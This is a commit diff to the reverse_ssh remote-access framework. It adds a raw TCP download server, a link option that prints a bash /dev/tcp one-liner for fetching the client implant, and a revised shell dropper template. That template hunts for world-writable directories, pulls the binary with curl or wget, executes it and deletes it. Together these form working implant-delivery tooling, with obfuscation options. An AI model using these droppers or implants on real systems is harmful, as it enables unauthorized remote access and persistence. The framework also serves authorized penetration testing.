Move webserver and downloader to better logging, add raw tcp downloading, add link command to generate bash/raw tcp download

Author: JSmith-Aura

cmd/server/main.go

@@ -27,7 +27,8 @@ func printHelp() {
 	fmt.Println("\t--tls\t\t\tEnable TLS on socket (ssh/http over TLS)")
 	fmt.Println("\t--tlscert\t\tTLS certificate path")
 	fmt.Println("\t--tlskey\t\tTLS key path")
-	fmt.Println("\t--webserver\t\tEnable webserver on the listen_address port")
+	fmt.Println("\t--webserver\t\t(Depreciated) Enable webserver on the listen_address port")
+	fmt.Println("\t--enable-client-downloads\t\tEnable webserver and raw TCP to download clients")
 	fmt.Println("\t--external_address\tIf the external IP and port of the RSSH server is different from the listening address, set that here")
 	fmt.Println("\t--timeout\t\tSet rssh client timeout (when a client is considered disconnected) defaults, in seconds, defaults to 5, if set to 0 timeout is disabled")
 	fmt.Println("  Utility")
@@ -37,18 +38,19 @@ func printHelp() {
 func main() {
 
 	options, err := terminal.ParseLineValidFlags(strings.Join(os.Args, " "), 0, map[string]bool{
-		"insecure":         true,
-		"tls":              true,
-		"tlscert":          true,
-		"tlskey":           true,
-		"external_address": true,
-		"fingerprint":      true,
-		"webserver":        true,
-		"datadir":          true,
-		"h":                true,
-		"help":             true,
-		"timeout":          true,
-		"openproxy":        true,
+		"insecure":                true,
+		"tls":                     true,
+		"tlscert":                 true,
+		"tlskey":                  true,
+		"external_address":        true,
+		"fingerprint":             true,
+		"webserver":               true, // deprecated
+		"enable-client-downloads": true,
+		"datadir":                 true,
+		"h":                       true,
+		"help":                    true,
+		"timeout":                 true,
+		"openproxy":               true,
 	})
 
 	if err != nil {
@@ -128,11 +130,16 @@ func main() {
 	tlscert, _ := options.GetArgString("tlscert")
 	tlskey, _ := options.GetArgString("tlskey")
 
-	webserver := options.IsSet("webserver")
+	enabledDownloads := options.IsSet("webserver") || options.IsSet("enable-client-downloads")
+
+	if options.IsSet("webserver") {
+		log.Println("[WARNING] --webserver is deprecated, use --enable-client-downloads")
+	}
+
 	connectBackAddress, err := options.GetArgString("external_address")
 
 	autogeneratedConnectBack := false
-	if err != nil && webserver {
+	if err != nil && enabledDownloads {
 		autogeneratedConnectBack = true
 
 		connectBackAddress = listenAddress
@@ -169,5 +176,5 @@ func main() {
 
 	log.Println("connect back: ", connectBackAddress)
 
-	server.Run(listenAddress, dataDir, connectBackAddress, autogeneratedConnectBack, tlscert, tlskey, insecure, webserver, tls, openproxy, timeout)
+	server.Run(listenAddress, dataDir, connectBackAddress, autogeneratedConnectBack, tlscert, tlskey, insecure, enabledDownloads, tls, openproxy, timeout)
 }

docker-entrypoint.sh

@@ -24,4 +24,4 @@ if [ ! -z "$SEED_AUTHORIZED_KEYS" ]; then
 fi
 
 cd /app/bin
-exec ./server --datadir /data --webserver --tls --external_address $EXTERNAL_ADDRESS :2222
+exec ./server --datadir /data --enable-client-downloads --tls --external_address $EXTERNAL_ADDRESS :2222

internal/server/commands/link.go

@@ -25,27 +25,29 @@ var spaceMatcher = regexp.MustCompile(`[\s]+`)
 func (l *link) ValidArgs() map[string]string {
 
 	r := map[string]string{
-		"s":             "Set homeserver address, defaults to server --external_address if set, or server listen address if not",
-		"l":             "List currently active download links",
-		"r":             "Remove download link",
-		"C":             "Comment to add as the public key (acts as the name)",
-		"goos":          "Set the target build operating system (default runtime GOOS)",
-		"goarch":        "Set the target build architecture (default runtime GOARCH)",
-		"goarm":         "Set the go arm variable (not set by default)",
-		"name":          "Set the link download url/filename (default random characters)",
-		"proxy":         "Set connect proxy address to bake it",
-		"tls":           "Use TLS as the underlying transport",
-		"ws":            "Use plain http websockets as the underlying transport",
-		"wss":           "Use TLS websockets as the underlying transport",
-		"stdio":         "Use stdin and stdout as transport, will disable logging, destination after stdio:// is ignored",
-		"http":          "Use http polling as the underlying transport",
-		"https":         "Use https polling as the underlying transport",
-		"shared-object": "Generate shared object file",
-		"fingerprint":   "Set RSSH server fingerprint will default to server public key",
-		"garble":        "Use garble to obfuscate the binary (requires garble to be installed)",
-		"upx":           "Use upx to compress the final binary (requires upx to be installed)",
-		"no-lib-c":      "Compile client without glibc",
-		"sni":           "When TLS is in use, set a custom SNI for the client to connect with",
+		"s":                 "Set homeserver address, defaults to server --external_address if set, or server listen address if not",
+		"l":                 "List currently active download links",
+		"r":                 "Remove download link",
+		"C":                 "Comment to add as the public key (acts as the name)",
+		"goos":              "Set the target build operating system (default runtime GOOS)",
+		"goarch":            "Set the target build architecture (default runtime GOARCH)",
+		"goarm":             "Set the go arm variable (not set by default)",
+		"name":              "Set the link download url/filename (default random characters)",
+		"proxy":             "Set connect proxy address to bake it",
+		"tls":               "Use TLS as the underlying transport",
+		"ws":                "Use plain http websockets as the underlying transport",
+		"wss":               "Use TLS websockets as the underlying transport",
+		"stdio":             "Use stdin and stdout as transport, will disable logging, destination after stdio:// is ignored",
+		"http":              "Use http polling as the underlying transport",
+		"https":             "Use https polling as the underlying transport",
+		"shared-object":     "Generate shared object file",
+		"fingerprint":       "Set RSSH server fingerprint will default to server public key",
+		"garble":            "Use garble to obfuscate the binary (requires garble to be installed)",
+		"upx":               "Use upx to compress the final binary (requires upx to be installed)",
+		"no-lib-c":          "Compile client without glibc",
+		"sni":               "When TLS is in use, set a custom SNI for the client to connect with",
+		"working-directory": "Set download/working directory for automatic script (i.e doing curl https://<url>.sh)",
+		"raw-download":      "Download over raw TCP, outputs bash downloader rather than http",
 	}
 
 	// Add duplicate flags for owners
@@ -117,6 +119,8 @@ func (l *link) Run(user *users.User, tty io.ReadWriter, line terminal.ParsedLine
 		UPX:           line.IsSet("upx"),
 		Garble:        line.IsSet("garble"),
 		DisableLibC:   line.IsSet("no-lib-c"),
+
+		RawDownload: line.IsSet("raw-download"),
 	}
 
 	var err error
@@ -206,6 +210,11 @@ func (l *link) Run(user *users.User, tty io.ReadWriter, line terminal.ParsedLine
 		}
 	}
 
+	buildConfig.WorkingDirectory, err = line.GetArgString("working-directory")
+	if err != nil && err != terminal.ErrFlagNotSet {
+		return err
+	}
+
 	if spaceMatcher.MatchString(buildConfig.Owners) {
 		return errors.New("owners flag cannot contain any whitespace")
 	}

internal/server/data/downloads.go

@@ -23,6 +23,9 @@ type Download struct {
 	Hits            int
 	Version         string
 	FileSize        float64
+
+	// Where to download the file to
+	WorkingDirectory string
 }
 
 func CreateDownload(file Download) error {

internal/server/server.go

@@ -11,6 +11,7 @@ import (
 	"github.com/NHAS/reverse_ssh/internal"
 	"github.com/NHAS/reverse_ssh/internal/server/data"
 	"github.com/NHAS/reverse_ssh/internal/server/multiplexer"
+	"github.com/NHAS/reverse_ssh/internal/server/tcp"
 	"github.com/NHAS/reverse_ssh/internal/server/webhooks"
 	"github.com/NHAS/reverse_ssh/internal/server/webserver"
 	"github.com/NHAS/reverse_ssh/pkg/mux"
@@ -46,10 +47,10 @@ func CreateOrLoadServerKeys(privateKeyPath string) (ssh.Signer, error) {
 	return private, nil
 }
 
-func Run(addr, dataDir, connectBackAddress string, autogeneratedConnectBack bool, TLSCertPath, TLSKeyPath string, insecure, enabledWebserver, enabletTLS, openproxy bool, timeout int) {
+func Run(addr, dataDir, connectBackAddress string, autogeneratedConnectBack bool, TLSCertPath, TLSKeyPath string, insecure, enabledDownloads, enabletTLS, openproxy bool, timeout int) {
 	c := mux.MultiplexerConfig{
 		Control:           true,
-		Downloads:         enabledWebserver,
+		Downloads:         enabledDownloads,
 		TLS:               enabletTLS,
 		TLSCertPath:       TLSCertPath,
 		TLSKeyPath:        TLSKeyPath,
@@ -94,12 +95,12 @@ func Run(addr, dataDir, connectBackAddress string, autogeneratedConnectBack bool
 
 	log.Println("Server key fingerprint: ", internal.FingerprintSHA256Hex(private.PublicKey()))
 
-	if enabledWebserver {
+	if enabledDownloads {
 		if len(connectBackAddress) == 0 {
 			connectBackAddress = addr
 		}
-		go webserver.Start(multiplexer.ServerMultiplexer.DownloadRequests(), connectBackAddress, autogeneratedConnectBack, "../", dataDir, private.PublicKey())
-
+		go webserver.Start(multiplexer.ServerMultiplexer.HTTPDownloadRequests(), connectBackAddress, autogeneratedConnectBack, "../", dataDir, private.PublicKey())
+		go tcp.Start(multiplexer.ServerMultiplexer.TCPDownloadRequests())
 	}
 
 	err = data.LoadDatabase(filepath.Join(dataDir, "data.db"))

internal/server/tcp/downloader.go

@@ -0,0 +1,69 @@
+package tcp
+
+import (
+	"io"
+	"log"
+	"net"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/NHAS/reverse_ssh/internal/server/data"
+	"github.com/NHAS/reverse_ssh/pkg/logger"
+)
+
+func handleBashConn(conn net.Conn) {
+	defer conn.Close()
+
+	downloadLog := logger.NewLog(conn.RemoteAddr().String())
+
+	conn.SetDeadline(time.Now().Add(3 * time.Second))
+	// RAW header prefix + 64 bytes for file ID
+	fileID := make([]byte, 67)
+
+	n, err := conn.Read(fileID)
+	if err != nil {
+		downloadLog.Warning("failed to download file using raw tcp: %s", err)
+		return
+	}
+
+	conn.SetDeadline(time.Time{})
+
+	if n == 0 || n < 3 {
+		downloadLog.Warning("recieved malformed raw download request")
+		return
+	}
+
+	filename := strings.TrimSpace(string(fileID[3:n]))
+
+	f, err := data.GetDownload(filename)
+	if err != nil {
+		downloadLog.Warning("failed to get file %q: err %s", filename, err)
+		return
+	}
+
+	file, err := os.Open(f.FilePath)
+	if err != nil {
+		downloadLog.Warning("failed to open file %q for download: %s", f.FilePath, err)
+		return
+	}
+	defer file.Close()
+
+	downloadLog.Info("downloaded %q using RAW tcp method", filename)
+
+	io.Copy(conn, file)
+}
+
+func Start(listener net.Listener) {
+
+	log.Println("Started Raw Download Server")
+	for {
+		conn, err := listener.Accept()
+		if err != nil {
+			log.Printf("failed to accept raw download connection: %s", err)
+			return
+		}
+
+		go handleBashConn(conn)
+	}
+}

internal/server/webserver/buildmanager.go

@@ -4,6 +4,7 @@ import (
 	"bytes"
 	"errors"
 	"fmt"
+	"net"
 	"os"
 	"os/exec"
 	"path/filepath"
@@ -39,6 +40,9 @@ type BuildConfig struct {
 	UPX           bool
 	Garble        bool
 	DisableLibC   bool
+	RawDownload   bool
+
+	WorkingDirectory string
 }
 
 func Build(config BuildConfig) (string, error) {
@@ -75,7 +79,7 @@ func Build(config BuildConfig) (string, error) {
 	}
 
 	var f data.Download
-
+	f.WorkingDirectory = config.WorkingDirectory
 	f.CallbackAddress = config.ConnectBackAdress
 
 	filename, err := internal.RandomString(16)
@@ -237,6 +241,16 @@ func Build(config BuildConfig) (string, error) {
 		return "", errors.New("cant write newly generated key to authorized controllee keys file: " + err.Error())
 	}
 
+	if config.RawDownload {
+
+		host, port, err := net.SplitHostPort(f.CallbackAddress)
+		if err != nil {
+			return fmt.Sprintf(`bash -c "exec 3<>/dev/tcp/HOSTHERE/PORT_HERE; echo RAW%[1]s>&3; cat <&3" > %[1]s`, config.Name), nil
+		}
+
+		return fmt.Sprintf(`bash -c "exec 3<>/dev/tcp/%s/%s; echo RAW%[3]s>&3; cat <&3" > %[3]s`, host, port, config.Name), nil
+	}
+
 	return "http://" + DefaultConnectBack + "/" + config.Name, nil
 }
 

internal/server/webserver/shellscripts/embed.go

@@ -11,12 +11,13 @@ import (
 var shellTemplates embed.FS
 
 type Args struct {
-	Protocol string
-	Host     string
-	Port     string
-	Name     string
-	Arch     string
-	OS       string
+	Protocol         string
+	Host             string
+	Port             string
+	Name             string
+	Arch             string
+	OS               string
+	WorkingDirectory string
 }
 
 func MakeTemplate(attributes Args, extension string) ([]byte, error) {

internal/server/webserver/shellscripts/templates/sh

@@ -2,24 +2,44 @@
 export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/bin:/bin:/sbin"
 
 
+
+download () {
+
+    if command -v curl &> /dev/null; then
+        curl {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}} -o "$1/{{.Name}}"
+    elif command -v  wget &> /dev/null; then
+        wget -O "$1/{{.Name}}" {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}
+    fi
+
+    chmod +x "$1/{{.Name}}"
+}
+
+{{if .WorkingDirectory}}
+
+download "{{.WorkingDirectory}}"
+
+"{{.WorkingDirectory}}/{{.Name}}"
+
+rm "{{.WorkingDirectory}}/{{.Name}}"
+
+{{else}}
+
 for i in "~" "." $(find / -maxdepth 3 -type d \( -perm -o+w \)); do
 
     if ! touch $i/{{.Name}}; then 
         continue
     fi
 
-    if command -v curl &> /dev/null; then
-        curl {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}} -o "$i/{{.Name}}"
-    elif command -v  wget &> /dev/null; then
-        wget -O "$i/{{.Name}}" {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}
-    fi
+    download "$i"
 
-    chmod +x "$i/{{.Name}}"
     if ! "$i/{{.Name}}"; then 
         continue
     fi
-    #Poor mans fileless
+
     rm "$i/{{.Name}}"
 
     break
-done
+done
+
+{{end}}
+